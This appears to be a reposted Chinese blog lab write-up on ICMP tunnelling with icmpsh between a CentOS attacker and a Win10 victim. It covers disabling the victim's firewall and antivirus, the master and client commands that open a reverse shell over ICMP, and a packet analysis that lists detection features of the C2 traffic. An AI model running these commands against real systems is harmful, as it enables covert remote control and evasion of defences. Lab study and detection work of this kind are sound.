当前位置:首页 » 《休闲阅读》 » 正文

【渗透测试】ICMP隧道技术之icmpsh使用(含流量分析)_SunnyCat

20 人参与  2022年02月16日 09:44  分类 : 《休闲阅读》  评论

点击全文阅读


目录

        • 一、环境
        • 二、工具
        • 三、操作
          • 1、CentOS7
          • 2、Win10
          • 3、反弹成功
        • 四、C2流量分析
          • 1、正常的icmp流量
          • 2、恶意的icmp流量
          • 3、C2数据
        • 总结

一、环境

Win10:10.95.16.112
CentOS7:10.95.16.103

二、工具

icmpsh
python2

三、操作

win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除
centOS7安装python2对应的库文件用于支持icmpsh工具

pip2 install impacket

在这里插入图片描述

1、CentOS7
sysctl -w net.ipv4.icmp_echo_ignore_all=1 【关闭本机的icmp响应】
python2 icmpsh_m.py 10.95.16.103 10.95.16.112 

在这里插入图片描述

2、Win10
icmpsh.exe -t 10.95.16.103 

在这里插入图片描述

3、反弹成功

在这里插入图片描述
【这里执行了whoamiipconfig两个命令便于观察下面流量信息】

四、C2流量分析

1、正常的icmp流量

数据包长度不大
数据包长度不大,有交互
数据包内容
在这里插入图片描述
在这里插入图片描述

2、恶意的icmp流量

数据包长度明显过长
在这里插入图片描述
且数据包没有data字段

在这里插入图片描述
在这里插入图片描述

3、C2数据

第一个包攻击机下达命令
在这里插入图片描述
第二个包回显命令执行结果
在这里插入图片描述
如果一来一回reply-request没有把命令回显结束,则会分包回显命令执行结果
执行了ipconfig命令
在这里插入图片描述
回显,一个包没有回显结束
在这里插入图片描述
第三个包空(reply包)
在这里插入图片描述
第四个包继续回显
在这里插入图片描述

总结

在当前的实验环境下,icmp流量抓取的相对容易,而且流量是明文传输,特征十分的明显。总结以下几点:
1、数据包长度过长
2、数包没有data字段
3、reply包携带明文的命令语句(同时没有info内容)
4、request包明文回显执行结果(info内容为 no response found
5、一个数据包回显不完C2结果会以多个包的形式回显(期间reply数据包没有data字段且info为空)

by 久违
2021.9.29


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/34836.html

流量  数据包  命令  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1